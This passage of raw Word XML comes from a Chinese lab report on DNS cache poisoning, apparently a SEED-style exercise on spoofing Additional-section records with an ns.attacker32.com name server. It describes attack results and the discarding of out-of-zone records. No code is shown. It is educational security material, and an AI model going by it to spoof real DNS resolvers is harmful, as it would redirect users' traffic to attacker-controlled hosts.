        <w:t>成功被映射，并且增加了n</w:t>
      </w:r>
      <w:r>
        <w:t>s.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的条目，但是并不能查询到</w:t>
      </w:r>
      <w:r>
        <w:t>google.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4465D799" w14:textId="779EE6C6" w:rsidR="0092395D" w:rsidRDefault="0092395D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="098D6299" wp14:editId="420062C0">
            <wp:extent cx="5274310" cy="807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1FE9" w14:textId="28286E04" w:rsidR="0094247A" w:rsidRDefault="0094247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32114B52" wp14:editId="5C9E02EF">
            <wp:extent cx="5274310" cy="7842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6AF2" w14:textId="3C498685" w:rsidR="0092395D" w:rsidRDefault="004C5655">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBA6213" wp14:editId="275C775E">
            <wp:extent cx="5274310" cy="7232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D57A" w14:textId="59F975AC" w:rsidR="009230D3" w:rsidRPr="005657F0" w:rsidRDefault="005657F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个受害者主机访问的是</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00193E3B">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidRPr="00193E3B">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ww.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域内的主机，所以本地</w:t>
      </w:r>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器会将其缓存，但是google</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并非example</w:t>
      </w:r>
      <w:r>
        <w:t>.co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m域中的，因此本地D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器并没有将这条伪造报文接收，所以n</w:t>
      </w:r>
      <w:r>
        <w:t>s.attacker32.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不会成为google.</w:t>
      </w:r>
      <w:r>
        <w:t>com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的域名服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE3CAD" w14:textId="672AA771" w:rsidR="004C5655" w:rsidRDefault="004C5655"/>
    <w:p w14:paraId="6A6677C9" w14:textId="780E3CC6" w:rsidR="004C5655" w:rsidRDefault="004C5655"/>
    <w:p w14:paraId="553E6134" w14:textId="5523E9AC" w:rsidR="004C5655" w:rsidRDefault="004C5655"/>
    <w:p w14:paraId="5DC846E5" w14:textId="43F68673" w:rsidR="004C5655" w:rsidRDefault="005657F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Task 5: Spoofifing Records in the Additional Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390B7A0" w14:textId="06CB53E2" w:rsidR="005657F0" w:rsidRDefault="005657F0">
      <w:r w:rsidRPr="005657F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005657F0">
        <w:t>DNS应答中，有一个称为附加部分的部分，用于提供附加信息。在实践中，它主要用于为某些主机名提供IP地址，特别是出现在Authority部分中的主机名。此任务的目标是欺骗本节中的一些条目，并查看它们是否会被目标本地DNS服务器成功缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DBB6D" w14:textId="50BC18E6" w:rsidR="005657F0" w:rsidRPr="005657F0" w:rsidRDefault="005657F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在代码中增加一些条目：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4F1BF" w14:textId="5B1401F9" w:rsidR="004C5655" w:rsidRDefault="00691F71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04637384" wp14:editId="776ECF4D">
            <wp:extent cx="5274310" cy="9378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A62B" w14:textId="74924432" w:rsidR="005657F0" w:rsidRDefault="005657F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除缓存后重新进行攻击，发现攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCAF735" w14:textId="2A4F337E" w:rsidR="004C5655" w:rsidRDefault="00691F71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4CCF5E" wp14:editId="63575291">
            <wp:extent cx="5274310" cy="589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3008" w14:textId="60C2584A" w:rsidR="005657F0" w:rsidRDefault="005657F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询D</w:t>
      </w:r>
      <w:r>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器缓存状态，发现只有e</w:t>
      </w:r>
      <w:r>
        <w:t>xample.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域中的两条记录，因为</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00193E3B">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidRPr="00193E3B">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ww.facebook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是该域中的，因此该部分会被丢弃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8800AB" w14:textId="66A6E6DD" w:rsidR="004C5655" w:rsidRDefault="00691F71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BF39AE2" wp14:editId="2FA90C3B">
            <wp:extent cx="5274310" cy="915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86B" w14:textId="77777777" w:rsidR="00531190" w:rsidRDefault="00531190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D39BC9D" w14:textId="77777777" w:rsidR="00531190" w:rsidRDefault="00531190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783CA944" w14:textId="2B05DA0F" w:rsidR="004C5655" w:rsidRDefault="00531190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>实验感想：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B3137" w14:textId="20AA6280" w:rsidR="00531190" w:rsidRPr="00531190" w:rsidRDefault="00531190">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>本次实验是对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>进行缓存攻击，可以发现伪造的报文可以将某个本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>服务器中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>条目对应到伪造的报文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>中去，可以发现这是一个攻击漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00650534">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>。但是出于保护，本地</w:t>
      </w:r>
      <w:r w:rsidR="00650534">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00650534">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NS</w:t>
      </w:r>
      <w:r w:rsidR="00650534">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Medi" w:hAnsi="NimbusRomNo9L-Medi" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>服务器并不会将在域外的一些域名进行映射，因此通过实验发现，这一部分攻击并不会成功。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00531190" w:rsidRPr="005311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EF34F" w14:textId="77777777" w:rsidR="00D6461A" w:rsidRDefault="00D6461A" w:rsidP="00D44311">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62189B14" w14:textId="77777777" w:rsidR="00D6461A" w:rsidRDefault="00D6461A" w:rsidP="00D44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4D862" w14:textId="77777777" w:rsidR="00D6461A" w:rsidRDefault="00D6461A" w:rsidP="00D44311">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2E9FC282" w14:textId="77777777" w:rsidR="00D6461A" w:rsidRDefault="00D6461A" w:rsidP="00D443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E66"/>
    <w:rsid w:val="00387916"/>
    <w:rsid w:val="00454E66"/>
    <w:rsid w:val="004C5655"/>
    <w:rsid w:val="00531190"/>
    <w:rsid w:val="005657F0"/>
    <w:rsid w:val="00650534"/>
    <w:rsid w:val="00691F71"/>
    <w:rsid w:val="00732C73"/>
    <w:rsid w:val="00840DF7"/>
    <w:rsid w:val="009230D3"/>
    <w:rsid w:val="0092395D"/>
    <w:rsid w:val="0094247A"/>
    <w:rsid w:val="00D44311"/>
    <w:rsid w:val="00D6461A"/>
    <w:rsid w:val="00DB48D7"/>
    <w:rsid w:val="00FD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9BA95"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{66F9D522-ECB3-4321-A8A6-04C2851E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43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43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43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4311"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00691F7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1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example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facebook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://www.example.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com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6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宸玮</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>顾 宸玮</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-21T14:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-22T02:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>